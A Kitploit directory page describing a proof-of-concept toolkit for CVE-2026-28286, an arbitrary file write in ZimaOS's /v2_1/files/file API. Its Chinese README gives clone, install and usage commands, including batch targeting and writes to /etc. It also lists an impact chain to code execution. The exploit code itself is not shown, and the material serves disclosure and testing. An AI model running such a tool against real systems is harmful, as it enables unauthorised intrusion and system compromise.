Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
zimaos-cve-2026-28286-arbitrary-file-write — PoCおよび検証ツールキット for CVE-2026-28286、ZimaOSにおける任意ファイル書き込みの脆弱性であり、API設定ミスを悪用して意図されたディレクトリ外にファイルを書き込むものです。 | Kitploit
ツール/GitHubGitHub/rushi9/zimaos-cve-2026-28286-arbitrary-file-write
脆弱性分析エクスプロイトウェブアプリケーション悪用APIセキュリティテストウェブセキュリティペネトレーションテスト
GitHubrushi9/zimaos-cve-2026-28286-arbitrary-file-write

zimaos-cve-2026-28286-arbitrary-file-write

PoCおよび検証ツールキット for CVE-2026-28286、ZimaOSにおける任意ファイル書き込みの脆弱性であり、API設定ミスを悪用して意図されたディレクトリ外にファイルを書き込むものです。

リポジトリを見るウェブサイト
214ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2026-28286 — ZimaOS 任意文件写入

从 API 配置错误 → 任意文件写入 → 潜在的系统入侵

⚡ 摘要

  • 端点: /v2_1/files/file
  • 问题: 无路径验证
  • 影响: 可在预期目录之外进行任意文件写入
  • 严重性: 🔴 严重

🧪 快速开始

root@kitploit:~
git clone https://github.com/Rushi9/zimaos-cve-2026-28286-arbitrary-file-write.git
cd zimaos-cve-2026-28286-arbitrary-file-write
pip install -r requirements.txt
python3 poc.py

⚙️ 命令行用法

您可以使用以下命令查看所有可用选项:

root@kitploit:~
python poc.py -h

📌 可用选项

root@kitploit:~
usage: poc.py [-h] [-u URL] [-t TARGETS] [-p PATH] [--proxy PROXY] [--token TOKEN] [-n ATTEMPTS] [--delay DELAY]

options:
  -h, --help            显示帮助信息并退出
  -u, --url URL         单个目标 URL
  -t, --targets TARGETS 目标文件(批量模式)
  -p, --path PATH       自定义文件路径(默认:/tmp)
  --proxy PROXY         代理 URL(例如:http://127.0.0.1:8080)
  --token TOKEN         Bearer 认证令牌
  -n, --attempts        尝试次数
  --delay               批量请求之间的延迟(秒)

🚀 使用示例

▶️ 1. 交互模式

root@kitploit:~
python poc.py

▶️ 2. 单个目标

root@kitploit:~
python poc.py -u http://localhost:8080

▶️ 3. 自定义路径

root@kitploit:~
python poc.py -u http://localhost:8080 -p /tmp

▶️ 4. 目标敏感路径(实验室测试)

root@kitploit:~
python poc.py -u http://localhost:8080 -p /etc

▶️ 5. 多次尝试

root@kitploit:~
python poc.py -u http://localhost:8080 -n 5

▶️ 6. 使用代理(Burp Suite)

root@kitploit:~
python poc.py -u http://localhost:8080 --proxy http://127.0.0.1:8080

▶️ 7. 批量模式

root@kitploit:~
python poc.py -t targets.txt

▶️ 8. 带延迟的批量模式

root@kitploit:~
python poc.py -t targets.txt --delay 2

▶️ 9. 全功能模式(所有选项)

root@kitploit:~
python poc.py -u http://target.com -p /tmp -n 3 --proxy http://127.0.0.1:8080 --token YOUR_TOKEN

💡 提示

使用 Burp Suite 的代理模式可以:

  • 检查请求
  • 修改载荷
  • 确认后端行为

🧠 技术分析

后端未能强制执行文件系统边界:

  • ❌ 无路径规范化
  • ❌ 无基础目录限制
  • ❌ 用户可控制的绝对路径

这允许写入以下位置:

root@kitploit:~
/tmp/
/etc/
/usr/local/bin/

💥 影响

root@kitploit:~
任意文件写入
        ↓
覆盖配置 / 脚本
        ↓
权限提升 / 远程代码执行


🎥 演示

image

📁 示例输出

root@kitploit:~
[✔] 已确认存在漏洞(LISTING_SUCCESS)
路径:/tmp/CVE-2026-28286_⚠️_abc123.txt

⭐ 支持

如果您觉得此工具有用,请考虑点个星标 ⭐ 这将帮助更多研究人员发现此工作。


⚠️ 免责声明

仅限授权测试使用。

ツールをダウンロード